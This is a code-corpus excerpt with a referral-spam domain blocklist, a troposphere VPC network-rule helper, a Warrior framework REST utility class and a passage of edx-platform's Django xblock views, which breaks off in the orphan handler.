drupa.com
dvr.biz.ua
e-buyeasy.com
ecomp3.ru
econom.co
edakgfvwql.ru
egovaleo.it
ekto.ee
e-kwiaciarz.pl
elmifarhangi.com
erot.co
escort-russian.com
este-line.com.ua
euromasterclass.ru
europages.com.ru
eurosamodelki.ru
event-tracking.com
fbdownloader.com
fiverr.com
floating-share-buttons.com
forex-procto.ru
forsex.info
forum20.smailik.org
forum69.info
free-share-buttons.com
free-social-buttons.com
freewhatsappload.com
fsalas.com
generalporn.org
germes-trans.com
get-free-traffic-now.com
ghazel.ru
girlporn.ru
gkvector.ru
glavprofit.ru
gobongo.info
goodprotein.ru
googlsucks.com
guardlink.org
handicapvantoday.com
howopen.ru
howtostopreferralspam.eu
hulfingtonpost.com
humanorightswatch.org
hundejo.com
hvd-store.com
ico.re
igru-xbox.net
iloveitaly.ro
iloveitaly.ru
ilovevitaly.co
ilovevitaly.com
ilovevitaly.info
ilovevitaly.org
ilovevitaly.ru
iminent.com
imperiafilm.ru
investpamm.ru
iskalko.ru
ispaniya-costa-blanca.ru
it-max.com.ua
jjbabskoe.ru
kabbalah-red-bracelets.com
kambasoft.com
kazrent.com
kino-fun.ru
kino-key.info
kinopolet.net
knigonosha.net
konkursov.net
laxdrills.com
littleberry.ru
livefixer.com
luxup.ru
makemoneyonline.com
manualterap.roleforum.ru
maridan.com.ua
masterseek.com
mebelcomplekt.ru
mebeldekor.com.ua
med-zdorovie.com.ua
minegam.com
mini.7zap.com
mirobuvi.com.ua
mirtorrent.net
mobilemedia.md
moyakuhnia.ru
msk.afora.ru
muscle-factory.com.ua
myftpupload.com
niki-mlt.ru
novosti-hi-tech.ru
online-hit.info
onlywoman.org
o-o-6-o-o.com
o-o-6-o-o.ru
o-o-8-o-o.ru
ooo-olni.ru
ozas.net
palvira.com.ua
petrovka-online.com
photokitchendesign.com
pornhub-forum.ga
pornhub-forum.uni.me
pornhub-ru.com
pornoforadult.com
portnoff.od.ua
pozdravleniya-c.ru
priceg.com
pricheski-video.com
producm.ru
prodvigator.ua
prointer.net.ua
promoforum.ru
psa48.ru
qwesa.ru
ranksonic.info
ranksonic.org
rapidgator-porn.ga
rcb101.ru
research.ifmo.ru
resellerclub.com
reversing.cc
rightenergysolutions.com.au
rospromtest.ru
sady-urala.ru
sanjosestartups.com
savetubevideo.com
screentoolkit.com
search-error.com
semalt.com
semaltmedia.com
seoexperimenty.ru
seopub.net
seo-smm.kz
sexyteens.hol.es
sharebutton.net
sharebutton.to
shop.xz618.com
sibecoprom.ru
simple-share-buttons.com
siteripz.net
sitevaluation.org
sledstvie-veli.net
slftsdybbg.ru
slkrm.ru
soaksoak.ru
social-buttons.com
socialseet.ru
sohoindia.net
solnplast.ru
sosdepotdebilan.com
spb.afora.ru
spravka130.ru
steame.ru
success-seo.com
superiends.org
taihouse.ru
tattooha.com
tedxrj.com
theguardlan.com
tomck.com
toyota.7zap.com
traffic2money.com
trafficmonetize.org
trafficmonetizer.org
trion.od.ua
uasb.ru
uzungil.com
videos-for-your-business.com
video-woman.com
viel.su
viktoria-center.ru
vodaodessa.com
vodkoved.ru
webmaster-traffic.com
webmonetizer.net
websites-reviews.com
websocial.me
wmasterlead.com
ykecwqlixx.ru
youporn-forum.ga
youporn-forum.uni.me
youporn-ru.com
zastroyka.org
""" | mit | 5,168,972,530,511,333,000 | 15.095941 | 99 | 0.837881 | false |
mccormickmichael/laurel | scaffold/cf/net.py | 1 | 1726 | #!/usr/bin/python
# Common functions and builders for VPC Templates
import troposphere as tp
import troposphere.ec2 as ec2
CIDR_ANY = '0.0.0.0/0'
CIDR_NONE = '0.0.0.0/32'
HTTP = 80
HTTPS = 443
SSH = 22
EPHEMERAL = (32767, 65536)
NAT = (1024, 65535)
ANY_PORT = (0, 65535)
TCP = '6'
UDP = '17'
ICMP = '1'
ANY_PROTOCOL = '-1'
def sg_rule(cidr, ports, protocol):
from_port, to_port = _asduo(ports)
return ec2.SecurityGroupRule(CidrIp=cidr,
FromPort=from_port,
ToPort=to_port,
IpProtocol=protocol)
def nacl_ingress(name, nacl, number, ports, protocol, cidr=CIDR_ANY, action='allow'):
return _nacl_rule(name, nacl, number, ports, protocol, False, cidr, action)
def nacl_egress(name, nacl, number, ports, protocol, cidr=CIDR_ANY, action='allow'):
return _nacl_rule(name, nacl, number, ports, protocol, True, cidr, action)
def _nacl_rule(name, nacl, number, ports, protocol, egress, cidr, action):
from_port, to_port = _asduo(ports)
return ec2.NetworkAclEntry(name,
NetworkAclId=_asref(nacl),
RuleNumber=number,
Protocol=protocol,
PortRange=ec2.PortRange(From=from_port, To=to_port),
Egress=egress,
RuleAction=action,
CidrBlock=cidr)
def _asduo(d):
return d if type(d) in [list, tuple] else (d, d)
def _asref(o):
return o if isinstance(o, tp.Ref) else tp.Ref(o)
def az_name(region, az):
if az.startswith(region):
return az
return region + az.lower()
| unlicense | -5,010,251,801,299,284,000 | 25.96875 | 85 | 0.562572 | false |
warriorframework/warriorframework | warrior/Framework/ClassUtils/rest_utils_class.py | 1 | 26837 | '''
Copyright 2017, Fujitsu Network Communications, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
"""API for operations related to REST Interfaces
Packages used = Requests (documentation available at http://docs.python-requests.org/) """
import re
import time
import os
import os.path
import json as JSON
from xml.dom.minidom import parseString
from Framework.Utils.testcase_Utils import pNote
import Framework.Utils as Utils
from Framework.ClassUtils.json_utils_class import JsonUtils
from Framework.Utils.print_Utils import print_error
from Framework.Utils import string_Utils
from Framework.Utils import data_Utils
class WRest(object):
"""WRest class has methods required to interact
with REST interfaces"""
def __init__(self):
"""constructor for WRest """
self.req = None
self.import_requests()
self.json_utils = JsonUtils()
def import_requests(self):
"""Import the requests module """
try:
import requests
except ImportError:
pNote("Requests module is not installed"\
"Please install requests module to"\
"perform any activities related to REST interfaces", "error")
else:
self.req = requests
def post(self, url, expected_response=None, data=None, auth=None, **kwargs):
""" performs a http post method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http post", "info")
try:
response = self.req.post(url, data=data, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'post')
return status, response
def get(self, url, expected_response=None, params=None, auth=None, **kwargs):
"""performs a http get method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http get", "info")
try:
response = self.req.get(url, params=params, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'get')
return status, response
def put(self, url, expected_response=None, data=None, auth=None, **kwargs):
""" performs a http put method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http put", "info")
try:
response = self.req.put(url, data=data, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'put')
return status, response
def patch(self, url, expected_response=None, data=None, auth=None, **kwargs):
""" performs a http patch method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http patch", "info")
try:
response = self.req.patch(url, data=data, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'patch')
return status, response
def delete(self, url, expected_response=None, auth=None, **kwargs):
""" performs a http delete method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http delete", "info")
try:
response = self.req.delete(url, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'delete')
return status, response
def options(self, url, expected_response=None, auth=None, **kwargs):
""" performs a http options method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http options", "info")
try:
response = self.req.options(url, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'options')
return status, response
def head(self, url, expected_response=None, auth=None, **kwargs):
""" performs a http head method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http head", "info")
try:
response = self.req.head(url, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'head')
return status, response
def cmp_response(self, response, expected_api_response,
expected_response_type, output_file,
generate_output_diff_file=True):
"""
Performs the comparison between api response
and expected_api_response
arguments:
1.response: API response getting from the data repository
2.expected_api_response : expected response which needs
to be compared given by the user.
3.expected_response_type: The type of the expected response.
It can be xml or json or text.
4.output_file: The file in which the difference will be written
if the responses are not equal.
5.generate_output_diff_file: If the responses does not match,
then generates an output file by writing the difference
to the file by default and if it set to False then doesnot
generate any file.
returns:
Returns True if the response matches with
the expected response else False.
"""
if response is not None and expected_api_response is not None:
if expected_response_type in response.headers['Content-Type']:
extracted_response = response.content
extension = Utils.rest_Utils.get_extension_from_path(expected_api_response)
if 'xml' in response.headers['Content-Type']:
try:
f = open(expected_api_response, 'r')
except IOError as exception:
if ".xml" == extension:
pNote("File does not exist in the"
" provided file path", "error")
return False
status, sorted_file1, sorted_file2, output_file = \
Utils.xml_Utils.compare_xml(extracted_response, expected_api_response,
output_file, sorted_json=False)
elif 'json' in response.headers['Content-Type']:
try:
expected_api_response = JSON.load(open(expected_api_response, 'r'))
for key, value in expected_api_response.items():
# replacing the environment/repo variable with value in the verify json
dict_key_value = {key: value}
env_out = data_Utils.sub_from_env_var(dict_key_value)
details_dict = data_Utils.sub_from_data_repo(dict_key_value)
expected_api_response[key] = env_out[key]
expected_api_response[key] = details_dict[key]
except IOError as exception:
if ".json" == extension:
pNote("File does not exist in the"
" provided file path", "error")
return False
expected_api_response = JSON.loads(expected_api_response)
extracted_response = JSON.loads(extracted_response)
status = self.json_utils.write_json_diff_to_file(
extracted_response, expected_api_response, output_file)
elif 'text' in response.headers['Content-Type']:
try:
f = open(expected_api_response, 'r')
expected_api_response = f.read()
f.close()
except IOError as exception:
if ".txt" == extension:
pNote("File does not exist in the"
" provided file path", "error")
return False
status = Utils.string_Utils.text_compare(
extracted_response, expected_api_response, output_file)
if not status:
if not generate_output_diff_file:
os.remove(output_file)
else:
pNote("api_response and expected_api_response do not match", "error")
pNote("The difference between the responses is saved here:{0}".format(output_file), "info")
return status
else:
type_of_response = Utils.rest_Utils.\
get_type_of_api_response(response)
pNote("Expected response type is {0}".
format(expected_response_type), "info")
pNote("API response type is {0}".
format(type_of_response), "info")
pNote("api_response and expected_api_response"
" types do not match", "error")
return False
else:
return False
def cmp_content_response(self, datafile, system_name, response,
expected_api_response, expected_response_type,
comparison_mode):
"""
Performs the comparison between api response
and expected_api_response
arguments:
1. datafile: Datafile of the test case
2. system_name: Name of the system from the datafile
Pattern: String Pattern
Multiple Values: No
Max Numbers of Values Accepted: 1
Characters Accepted: All Characters
Other Restrictions: Should be valid system name
from the datafile
eg: http_system_1
3. response: API response getting from the data repository
4. expected_api_response : expected response which needs
to be compared given by the user.
5. expected_response_type: The type of the expected response.
It can be xml or json or text.
6. comparison_mode:
This is the mode in which you wish to compare
The supported comparison modes are
file, string, regex=expression, jsonpath=path, xpath=path
If you have given comparison_mode as file or string then
whole comparison will take place
If you wish to check content of expected response and
if it is only one value_check pass it in either data file
or test case file
If it is more than one value_check
then pass it in data file in comparison_mode and expected_api_response
tags under system
If it is xml response then you need to give xpath=path to it
If it is string response then you can pass regex=expressions
and you can leave expected_api_response empty
Ex for passing values in data file if it is json response
<comparison_mode>
<response_path>jsonpath=1.2.3</response_path>
<response_path>jsonpath=1.2</response_path>
</comparison_mode>
<expected_api_response>
<response_value>4</response_value>
<response_value>5</response_value>
</expected_api_response>
returns:
Returns True if the response matches with
the expected response else False.
"""
if expected_response_type in response.headers['Content-Type']:
extracted_response = response.content
if comparison_mode:
path_list = [comparison_mode]
responses_list = [expected_api_response]
else:
path_list, responses_list = Utils.xml_Utils.\
list_path_responses_datafile(datafile, system_name)
if path_list:
if "xml" in response.headers['Content-Type']:
status = Utils.xml_Utils.compare_xml_using_xpath(extracted_response,
path_list, responses_list)
elif "json" in response.headers['Content-Type']:
status = self.json_utils.compare_json_using_jsonpath(extracted_response,
path_list, responses_list)
else:
status = Utils.string_Utils.compare_string_using_regex(extracted_response,
path_list)
else:
print_error("Please provide the values for comparison_mode and "
"expected_api_response")
status = False
else:
type_of_response = Utils.rest_Utils.\
get_type_of_api_response(response)
pNote("Expected response type is {0}".
format(expected_response_type), "info")
pNote("API response type is {0}".
format(type_of_response), "info")
pNote("api_response and expected_api_response"
" types do not match", "error")
status = False
return status
@classmethod
def report_response_status(cls, status, expected_response, action):
"""Reports the response status of http
actions with a print message to the user"""
result = False
if expected_response is None or expected_response is False or \
expected_response == [] or expected_response == "":
pattern = re.compile('^2[0-9][0-9]$')
if pattern.match(str(status)) is not None:
pNote("http {0} successful".format(action), "info")
result = True
elif isinstance(expected_response, list):
for i in range(0, len(expected_response)):
if str(status) == expected_response[i]:
pNote("http {0} successful".format(action), "info")
result = True
elif str(status) == expected_response:
pNote("http {0} successful".format(action), "info")
result = True
if not result:
pNote("http {0} failed".format(action), "error")
return result
def catch_expection_return_error(self, exception_name, url):
""" Function for catching expections thrown by REST operations
"""
if exception_name.__class__.__name__ == self.req.exceptions.ConnectionError.__name__:
pNote("Max retries exceeded with URL {0}. Failed to establish a new connection.".
format(url), "error")
status = False
response = None
elif exception_name.__class__.__name__ == self.req.exceptions.InvalidURL.__name__:
pNote("Could not process the request. {0} is somehow invalid.".format(url), "error")
status = "ERROR"
response = None
elif exception_name.__class__.__name__ == self.req.exceptions.URLRequired.__name__:
pNote("Could not process the request. A valid URL is required to make a request.".
format(url), "error")
status = "ERROR"
response = None
elif exception_name.__class__.__name__ == self.req.exceptions.MissingSchema.__name__:
pNote("Could not process the request. The URL schema (e.g. http or https) is missing.".
format(url), "error")
status = "ERROR"
response = None
elif exception_name.__class__.__name__ == ValueError.__name__:
pNote("Could not process the request. May be the value provided for timeout is "
"invalid or the schema is invalid.", "error")
status = "ERROR"
response = None
elif exception_name.__class__.__name__ == self.req.exceptions.ConnectTimeout.__name__:
pNote("The request timed out while trying to connect to the remote server.", "error")
status = False
response = None
elif exception_name.__class__.__name__ == self.req.exceptions.ReadTimeout.__name__:
pNote("The server did not send any data in the allotted amount of time.", "error")
status = False
response = None
else:
pNote("An Error Occurred: {0}".format(exception_name), "error")
status = False
response = None
return status, response
def check_connection(self, url, auth=None, **kwargs):
"""Internally uses the http options to check connection status.
i.e.
- If connection is successfull return a true
- if any ConnectionError is detected returns a False."""
try:
status = False
api_response = self.req.options(url, auth=auth, **kwargs)
if not str(api_response).startswith('2') or \
str(api_response).startswith('1'):
pNote("Connection was successful, but there was"\
"problem accessing the resource: {0}".format(url), "info")
status = False
except self.req.ConnectionError:
pNote("Connection to url is down: {0}".format(url), "debug")
except self.req.HTTPError:
pNote("Problem accessing resource: {0}".format(url), "debug")
else:
pNote("Connection to resource successfull: {0}".format(url), "debug")
status = True
return status
def update_output_dict(self, system_name, api_response, request_id, status, i):
"""
updates the output dictionary with status code and response object and text response
and placing another dictionary inside output dict and updating it with status code and content type
and extracted content from object and response object
"""
output_dict = {}
pNote("Total number of requests in this step: {0}".format(i))
pNote("This is request number: {0}".format(i))
pNote("status: {0}".format(status), "debug")
pNote("api_response: {0}".format(api_response), "debug")
output_dict["{0}_api_response".format(system_name)] = api_response
output_dict["{0}_api_response_object".format(system_name)] = api_response
if api_response is not None:
text = api_response.text
status_code = api_response.status_code
headers = api_response.headers
output_response = self.get_output_response(api_response)
history = api_response.history
else:
text = None
status_code = None
headers = None
output_response = None
history = None
output_dict["{0}_status".format(system_name)] = status_code
pNote("api_response_history: {0}".format(history), "debug")
if request_id is not None:
output_dict["{0}_{1}_api_response_object_{2}".format(system_name, request_id, i)] = api_response
output_dict["{0}_{1}_api_response_text_{2}".format(system_name, request_id, i)] = text
output_dict["{0}_{1}_api_response_status_{2}".format(system_name, request_id, i)] = status_code
output_dict["{0}_{1}_api_response_headers_{2}".format(system_name, request_id, i)] = headers
output_dict["{0}_{1}_api_response_content_{2}".format(system_name, request_id, i)] = output_response
output_dict["{0}_{1}_api_response_object".format(system_name, request_id)] = api_response
output_dict["{0}_{1}_api_response_text".format(system_name, request_id)] = text
output_dict["{0}_{1}_api_response_status".format(system_name, request_id)] = status_code
output_dict["{0}_{1}_api_response_headers".format(system_name, request_id)] = headers
output_dict["{0}_{1}_api_response_content".format(system_name, request_id)] = output_response
else:
output_dict["{0}_api_response_object_{1}".format(system_name, i)] = api_response
output_dict["{0}_api_response_text_{1}".format(system_name, i)] = text
output_dict["{0}_api_response_status_{1}".format(system_name, i)] = status_code
output_dict["{0}_api_response_headers_{1}".format(system_name, i)] = headers
output_dict["{0}_api_response_content_{1}".format(system_name, i)] = output_response
output_dict["{0}_api_response_object".format(system_name)] = api_response
output_dict["{0}_api_response_text".format(system_name)] = text
output_dict["{0}_api_response_status".format(system_name)] = status_code
output_dict["{0}_api_response_headers".format(system_name)] = headers
output_dict["{0}_api_response_content".format(system_name)] = output_response
return output_dict
@staticmethod
def get_output_response(api_response):
"""
This method is used to convert the given api_response in the form of text / xml / json
Params:
api_response : api_response
Returns:
ouptut_response in the form of text/xml/json
"""
if api_response is not None:
try:
output_response = parseString("".join(api_response.text))
except:
try:
JSON.loads(api_response.text)
except:
output_response = api_response.text.encode('ascii', 'ignore')
pNote("api_response Text: \n {0}".format(output_response))
else:
output_response = api_response.json()
pNote("api_response (JSON format): \n {0}".
format(JSON.dumps(output_response, indent=4)))
else:
pNote("api_response (XML format): \n {0}".
format(output_response.toprettyxml(newl='\n')))
else:
output_response = None
return output_response
def try_until_resource_status(self, url, auth=None, status="up", trials=5, **kwargs):
""" Tries to connect to the resource until resource
reaches the specified status. Tries for the number mentioned in the
trials parameter (default=5)
waits for a time of 30 seconds between trials
"""
final_status = False
if status.upper() == "UP":
expected_result = True
elif status.upper() == "DOWN":
expected_result = False
i = 1
while i <= trials:
pNote("Trial: {0}".format(i), "info")
result = self.check_connection(url, auth, **kwargs)
if result == expected_result:
final_status = True
break
i += 1
time.sleep(10)
return final_status | apache-2.0 | 2,335,298,934,855,537,700 | 47.096774 | 115 | 0.571077 | false |
pelikanchik/edx-platform | cms/djangoapps/contentstore/views/item.py | 1 | 18095 | # -*- coding: utf-8 -*-
"""Views for items (modules)."""
import json
import logging
from uuid import uuid4
from functools import partial
from static_replace import replace_static_urls
from xmodule_modifiers import wrap_xblock
from django.core.exceptions import PermissionDenied
from django.contrib.auth.decorators import login_required
from xmodule.modulestore.django import modulestore, loc_mapper
from xmodule.modulestore.inheritance import own_metadata
from xmodule.modulestore.exceptions import ItemNotFoundError, InvalidLocationError
from util.json_request import expect_json, JsonResponse
from util.string_utils import str_to_bool
from ..transcripts_utils import manage_video_subtitles_save
from ..utils import get_modulestore
from .access import has_access
from .helpers import _xmodule_recurse
from xmodule.x_module import XModuleDescriptor
from django.views.decorators.http import require_http_methods
from xmodule.modulestore.locator import BlockUsageLocator
from student.models import CourseEnrollment
from django.http import HttpResponseBadRequest
from xblock.fields import Scope
from preview import handler_prefix, get_preview_html
from edxmako.shortcuts import render_to_response, render_to_string
from models.settings.course_grading import CourseGradingModel
__all__ = ['orphan_handler', 'xblock_handler']
log = logging.getLogger(__name__)
# cdodge: these are categories which should not be parented, they are detached from the hierarchy
DETACHED_CATEGORIES = ['about', 'static_tab', 'course_info']
CREATE_IF_NOT_FOUND = ['course_info']
# pylint: disable=unused-argument
@require_http_methods(("DELETE", "GET", "PUT", "POST"))
@login_required
@expect_json
def xblock_handler(request, tag=None, package_id=None, branch=None, version_guid=None, block=None):
"""
The restful handler for xblock requests.
DELETE
json: delete this xblock instance from the course. Supports query parameters "recurse" to delete
all children and "all_versions" to delete from all (mongo) versions.
GET
json: returns representation of the xblock (locator id, data, and metadata).
if ?fields=graderType, it returns the graderType for the unit instead of the above.
html: returns HTML for rendering the xblock (which includes both the "preview" view and the "editor" view)
PUT or POST
json: if xblock locator is specified, update the xblock instance. The json payload can contain
these fields, all optional:
:data: the new value for the data.
:children: the locator ids of children for this xblock.
:metadata: new values for the metadata fields. Any whose values are None will be deleted not set
to None! Absent ones will be left alone.
:nullout: which metadata fields to set to None
:graderType: change how this unit is graded
:publish: can be one of three values, 'make_public, 'make_private', or 'create_draft'
The JSON representation on the updated xblock (minus children) is returned.
if xblock locator is not specified, create a new xblock instance. The json playload can contain
these fields:
:parent_locator: parent for new xblock, required
:category: type of xblock, required
:display_name: name for new xblock, optional
:boilerplate: template name for populating fields, optional
The locator (and old-style id) for the created xblock (minus children) is returned.
"""
if package_id is not None:
locator = BlockUsageLocator(package_id=package_id, branch=branch, version_guid=version_guid, block_id=block)
if not has_access(request.user, locator):
raise PermissionDenied()
old_location = loc_mapper().translate_locator_to_location(locator)
if request.method == 'GET':
if 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
fields = request.REQUEST.get('fields', '').split(',')
if 'graderType' in fields:
# right now can't combine output of this w/ output of _get_module_info, but worthy goal
return JsonResponse(CourseGradingModel.get_section_grader_type(locator))
# TODO: pass fields to _get_module_info and only return those
rsp = _get_module_info(locator)
return JsonResponse(rsp)
else:
component = modulestore().get_item(old_location)
# Wrap the generated fragment in the xmodule_editor div so that the javascript
# can bind to it correctly
component.runtime.wrappers.append(partial(wrap_xblock, handler_prefix))
try:
content = component.render('studio_view').content
# catch exceptions indiscriminately, since after this point they escape the
# dungeon and surface as uneditable, unsaveable, and undeletable
# component-goblins.
except Exception as exc: # pylint: disable=W0703
log.debug("Unable to render studio_view for %r", component, exc_info=True)
content = render_to_string('html_error.html', {'message': str(exc)})
mod_class = component.__class__.__name__
current_module_class = 'other'
if "CapaDescriptor" in mod_class:
current_module_class = 'problem'
if "VideoDescriptor" in mod_class:
current_module_class = 'video'
return render_to_response('component.html', {
'preview': get_preview_html(request, component),
'module_class': current_module_class,
'editor': content
})
elif request.method == 'DELETE':
delete_children = str_to_bool(request.REQUEST.get('recurse', 'False'))
delete_all_versions = str_to_bool(request.REQUEST.get('all_versions', 'False'))
return _delete_item_at_location(old_location, delete_children, delete_all_versions)
else: # Since we have a package_id, we are updating an existing xblock.
return _save_item(
request,
locator,
old_location,
data=request.json.get('data'),
children=request.json.get('children'),
metadata=request.json.get('metadata'),
nullout=request.json.get('nullout'),
grader_type=request.json.get('graderType'),
publish=request.json.get('publish'),
)
elif request.method in ('PUT', 'POST'):
return _create_item(request)
else:
return HttpResponseBadRequest(
"Only instance creation is supported without a package_id.",
content_type="text/plain"
)
def _save_item(request, usage_loc, item_location, data=None, children=None, metadata=None, nullout=None,
grader_type=None, publish=None):
"""
Saves xblock w/ its fields. Has special processing for grader_type, publish, and nullout and Nones in metadata.
nullout means to truly set the field to None whereas nones in metadata mean to unset them (so they revert
to default).
The item_location is still the old-style location whereas usage_loc is a BlockUsageLocator
"""
store = get_modulestore(item_location)
try:
existing_item = store.get_item(item_location)
except ItemNotFoundError:
if item_location.category in CREATE_IF_NOT_FOUND:
# New module at this location, for pages that are not pre-created.
# Used for course info handouts.
store.create_and_save_xmodule(item_location)
existing_item = store.get_item(item_location)
else:
raise
except InvalidLocationError:
log.error("Can't find item by location.")
return JsonResponse({"error": "Can't find item by location: " + str(item_location)}, 404)
if publish:
if publish == 'make_private':
_xmodule_recurse(existing_item, lambda i: modulestore().unpublish(i.location))
elif publish == 'create_draft':
# This clones the existing item location to a draft location (the draft is
# implicit, because modulestore is a Draft modulestore)
modulestore().convert_to_draft(item_location)
if data:
store.update_item(item_location, data)
else:
data = existing_item.get_explicitly_set_fields_by_scope(Scope.content)
if children is not None:
children_ids = [
loc_mapper().translate_locator_to_location(BlockUsageLocator(child_locator)).url()
for child_locator
in children
]
store.update_children(item_location, children_ids)
# cdodge: also commit any metadata which might have been passed along
if nullout is not None or metadata is not None:
# the postback is not the complete metadata, as there's system metadata which is
# not presented to the end-user for editing. So let's use the original (existing_item) and
# 'apply' the submitted metadata, so we don't end up deleting system metadata.
if nullout is not None:
for metadata_key in nullout:
setattr(existing_item, metadata_key, None)
# update existing metadata with submitted metadata (which can be partial)
# IMPORTANT NOTE: if the client passed 'null' (None) for a piece of metadata that means 'remove it'. If
# the intent is to make it None, use the nullout field
if metadata is not None:
for metadata_key, value in metadata.items():
if metadata_key == "locator_term":
temp_key = "direct_term"
json_array = json.loads(value)
for x in json_array:
old_loc = str(loc_mapper().translate_locator_to_location(x["direct_element_id"]))
i = old_loc.rfind("/")
short_name = old_loc[i+1:]
x["direct_element_id"] = short_name
for every_edge in x["disjunctions"]:
for every_cond in every_edge["conjunctions"]:
old_loc = str(loc_mapper().translate_locator_to_location(every_cond["source_element_id"]))
i = old_loc.rfind("/")
short_name = old_loc[i+1:]
every_cond["source_element_id"] = short_name
temp_value = json.dumps(json_array)
else:
temp_key = metadata_key
temp_value = value
field = existing_item.fields[temp_key]
if temp_value is None:
field.delete_from(existing_item)
else:
try:
temp_value = field.from_json(temp_value)
except ValueError:
return JsonResponse({"error": "Invalid data"}, 400)
field.write_to(existing_item, temp_value)
# Save the data that we've just changed to the underlying
# MongoKeyValueStore before we update the mongo datastore.
existing_item.save()
# commit to datastore
store.update_metadata(item_location, own_metadata(existing_item))
if existing_item.category == 'video':
manage_video_subtitles_save(existing_item, existing_item)
result = {
'id': unicode(usage_loc),
'data': data,
'metadata': own_metadata(existing_item)
}
if grader_type is not None:
result.update(CourseGradingModel.update_section_grader_type(existing_item, grader_type))
# Make public after updating the xblock, in case the caller asked
# for both an update and a publish.
if publish and publish == 'make_public':
_xmodule_recurse(
existing_item,
lambda i: modulestore().publish(i.location, request.user.id)
)
# Note that children aren't being returned until we have a use case.
return JsonResponse(result)
@login_required
@expect_json
def _create_item(request):
"""View for create items."""
parent_locator = BlockUsageLocator(request.json['parent_locator'])
parent_location = loc_mapper().translate_locator_to_location(parent_locator)
try:
category = request.json['category']
except KeyError:
category = 'problem'
display_name = request.json.get('display_name')
if not has_access(request.user, parent_location):
raise PermissionDenied()
parent = get_modulestore(category).get_item(parent_location)
dest_location = parent_location.replace(category=category, name=uuid4().hex)
# get the metadata, display_name, and definition from the request
metadata = {}
data = None
template_id = request.json.get('boilerplate')
if template_id is not None:
clz = XModuleDescriptor.load_class(category)
if clz is not None:
template = clz.get_template(template_id)
if template is not None:
metadata = template.get('metadata', {})
data = template.get('data')
if display_name is not None:
metadata['display_name'] = display_name
get_modulestore(category).create_and_save_xmodule(
dest_location,
definition_data=data,
metadata=metadata,
system=parent.system,
)
if category not in DETACHED_CATEGORIES:
get_modulestore(parent.location).update_children(parent_location, parent.children + [dest_location.url()])
course_location = loc_mapper().translate_locator_to_location(parent_locator, get_course=True)
locator = loc_mapper().translate_location(course_location.course_id, dest_location, False, True)
return JsonResponse({"locator": unicode(locator)})
def _delete_item_at_location(item_location, delete_children=False, delete_all_versions=False):
"""
Deletes the item at with the given Location.
It is assumed that course permissions have already been checked.
"""
store = get_modulestore(item_location)
item = store.get_item(item_location)
if delete_children:
_xmodule_recurse(item, lambda i: store.delete_item(i.location, delete_all_versions))
else:
store.delete_item(item.location, delete_all_versions)
# cdodge: we need to remove our parent's pointer to us so that it is no longer dangling
if delete_all_versions:
parent_locs = modulestore('direct').get_parent_locations(item_location, None)
for parent_loc in parent_locs:
parent = modulestore('direct').get_item(parent_loc)
item_url = item_location.url()
if item_url in parent.children:
children = parent.children
children.remove(item_url)
parent.children = children
modulestore('direct').update_children(parent.location, parent.children)
return JsonResponse()
# pylint: disable=W0613
@login_required
@require_http_methods(("GET", "DELETE"))
def orphan_handler(request, tag=None, package_id=None, branch=None, version_guid=None, block=None):
"""
View for handling orphan related requests. GET gets all of the current orphans.
DELETE removes all orphans (requires is_staff access)
An orphan is a block whose category is not in the DETACHED_CATEGORY list, is not the root, and is not reachable
from the root via children
:param request:
:param package_id: Locator syntax package_id
"""
location = BlockUsageLocator(package_id=package_id, branch=branch, version_guid=version_guid, block_id=block)
# DHM: when split becomes back-end, move or conditionalize this conversion
old_location = loc_mapper().translate_locator_to_location(location)
if request.method == 'GET':
if has_access(request.user, old_location):
return JsonResponse(modulestore().get_orphans(old_location, DETACHED_CATEGORIES, 'draft'))
else:
raise PermissionDenied()
if request.method == 'DELETE':
if request.user.is_staff:
